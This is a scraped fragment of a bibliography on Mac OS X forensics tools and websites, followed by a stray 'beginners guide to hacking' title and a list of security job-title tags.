5. Joyce, R., Powers, J., & Adelstein, F. (2008). MEGA: A tool for Mac OS X operating system and appli-cation forensics. Digital Investigation, 5, S83-S90. doi:10.1016/j.diin.2008.05.011

6. Macenstien Website, (2009). The Seedy World of OS X Forensics. Retrieved from http://macenstein.com/default/2009/01/entering-the-seedy-world-of-mac-os-x-forensics/

7. Browning, J., & Galvin, A. (2010). Hack a Mac. 8. BlackBag Website (2011). Black Bag Forensics. Re-

trieved from https://www.blackbagtech.com/foren-sics.html

9. MacMarshall Websit

(01_2013) - beginners guide to hacking

Documents

information security

executive information

ict security manager

corporate security advisor

senior security analyst

annualcyber security

chief information officer

project manager